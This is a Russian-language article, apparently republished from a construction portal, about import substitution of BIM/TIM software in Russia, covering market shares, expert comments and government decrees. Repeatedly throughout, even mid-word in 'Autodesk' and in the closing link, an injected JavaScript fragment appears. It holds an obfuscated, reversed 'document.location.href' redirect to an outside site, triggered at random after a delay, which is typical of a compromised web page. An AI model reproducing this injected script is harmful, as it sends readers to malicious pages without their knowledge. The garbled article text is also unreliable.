Заместительная терапия: что происходит с BIM и ТИМ-технологиями

Комментарий Юрия Аксёнова, партнёра Orchards, для портала Строим Просто.

По разным оценкам, с февраля из России ушли или приостановили работу более трёхсот IT-компаний, в том числе, поставляющих BIM-решения. Однако катастрофы в отрасли и на рынках нет, убеждены в профильных ведомствах: за 3–4 года можно не только заместить до 98% программного обеспечения, но и вырастить собственных «технологических чемпионов», которые будут разрабатывать инновационные программные продукты и для себя, и на экспорт.

По прогнозам PwC, сегмент BIM-технологий должен вырасти к 2023 году, как минимум, в 1,5 раза. Для России до февральских событий показатели выдавались ещё оптимистичнее – с 1 января 2022 года все объекты, которые строятся за счёт госбюджета и по госзаказу, должны были проектироваться с помощью BIM. По словам мэра Москвы Сергея Собянина, именно цифровая трансформация, которая была выбрана столицей по примеру большинства мегаполисов мира, является ключевым условием для дальнейшего развития города.

Собственные информационные системы и технологии же, включая BIM (в российском варианте – ТИМ – технологии информационного моделирования) в стране разрабатывались с 2012-го. Планировалось, что помощь в подготовке кадров заказчика и проектных, строительных структур окажут запущенные московской мэрией центры компетенций ТИМ, а затем опыт разойдётся по всей стране. С BIM и ТИМ планировалось активно работать, в том числе, в рамках программы реновации московского жилого фонда.

Пандемия коронавируса и бум удалённой работы ускорили «уход в цифру»: тогда очень быстро изменился сам процесс проектирования. Часть работы ушла в «облака», мессенджеры и другие сервисы – в итоге одна из самых консервативных отраслей рынка тоже максимально перешла на «удалёнку».

Что это такое?

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-msk.ru/stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torage/app/media/News/2022/09/BIM1.webp» alt=»»/>

Сделано на импорт

По оценкам BuildDocs (Amethyst Group), в общем объёме российского рынка IT-продуктов для стройки на долю иностранных компаний сейчас приходится 56%. Однако часть крупнейших зарубежных игроков в ближайшее время планирует покинуть Россию, а для полного импортозамещения отечественным разработчикам потребуется до пяти лет, если процесс не затормозит пиратство и параллельный импорт.

В итоге в компании делят рынок решений для строительного бизнеса на пять условных категорий: финансовую, управленческую, работу с проектной документацией, решения непосредственно для строителей и работу офиса. В общем объёме всех этих решений на долю иностранных компаний и приходится 56%.

В финансовом секторе уже сейчас правит бал российская «1С», которая занимает почти 100% сегмента. Аналогичная ситуация – в нише продуктов, предназначенных для строителей, где все решения представлены отечественными разработчиками; иностранные компании не успели сюда зайти, а российские крайне агрессивно захватили рынок, подчёркивают в BuildDocs.

А вот остальные три условно выделенных сегмента практически полностью представлены иностранными игроками: в управлении проектами лидирующие позиции занимают Primavera и BIM 360 от Autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todesk, на долю которых приходится порядка 90% рынка.

В сфере работы с проектной документацией годами доминирует Autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todesk Autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toCAD, которая также занимала около 90% рынка. Непосредственно в сегменте BIM – BIM 360 от всё той же Autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todesk.

По словам Евгения Бузлаева, генерального директора BuildDocs (Amethyst Group), на полное импортозамещение IT-решений для стройки потребуется до пяти лет. Импортозамещение, безусловно, настанет, если только рынок не откроют обратно для ушедших игроков, убеждён он. На торможение процесса будут также влиять пиратство и параллельный импорт. Пока же в сегменте присутствует некая часть отечественных решений, на которые застройщики смогут быстро перейти после ухода иностранных компаний, но вот что-то быстро заместить точно не удастся.

Законные основания

Профильные ведомства не раз подчёркивали, что BIM-технологии в России внедряются не комплексным образом, а по фазам строительства: инвестиционное обоснование, проектирование и других. По словам Юрия Аксёнова, партнёра Orchards, основы национального регулирования применения ТИМ в капитальном строительстве заложены в постановлении Правительства № 1431 от 15.09.2020, определившем состав сведений, документов и материалов, включаемых в информационную модель. 

Далее в марте 2021 года постановление Правительства №331 закрепило обязанность по формированию и ведению информационной модели ОКС в рамках государственных закупок проектных работ после 01.01.2022. Утвержденная Правительством в ноябре 2021 года «дорожная карта» реализации постановления №331 предусматривала в I квартале 2022 года определение мер поддержки разработчиков отечественного ПО, используемого в области ТИМ ОКС, последовательное совершенствование нормативной правовой и нормативно-технической базы, а также обеспечение интеграции классификатора строительной информации с государственными элементными сметными нормами (ГЭСН) и классификатором строительных ресурсов (КСР).

«Как видно из открытых источников, по состоянию на август 2022 года Правительством разработаны, но еще не приняты изменения в постановление №331, распространяющие применение ТИМ в отношениях, регулируемых ФЗ-214: с 01.01.2023 в строительстве многоквартирных домов и с 01.01.2024 в отношении ОКС границах территории малоэтажных жилых комплексов в случаях, когда подготовка проектной документации является обязательной, — поясняет Юрий Аксенов. —  По состоянию на конец февраля 2022 года регулирование применения ТИМ в России также еще находилось на начальной стадии становления. Нельзя исключать, что последовавшие события затронули этот процесс, сместив приоритеты и ресурсы регулятора в сторону иных вопросов актуальной повестки».

«Правила формирования и ведения информационной модели утвердили еще осенью 2020 года, а уже с 1 января этого года использование ТИМ стало обязательным для всех объектов капитального строительства с государственным участием, — делится, в свою очередь, Наталья Пахомова, специалист по технической поддержке и обучению компании ROCKWOOL Russia. — В дальнейшем правило распространится и на коммерческие проекты с долевым участием, и на всю строительную отрасль в целом. Однако уже сегодня многие коммерческие компании применяют ТИМ в строительстве: преимущество технологии в том, что она помогает не допустить ошибки в проектировании из-за несогласованности между специалистами, снижает риски человеческого фактора, а также позволяет ускорить весь процесс строительства. Кроме того, по оценкам экспертов, применение ТИМ позволит сэкономить до 30% затрат на возведение и эксплуатацию зданий».

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-msk.ru/publications/zamestitelnaya-terapiya-chtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-proishodit-s-bim-i-tim-tehnologiyami/»>Ссылка на статью >>

Подпишитесь на Telegram Orchards

X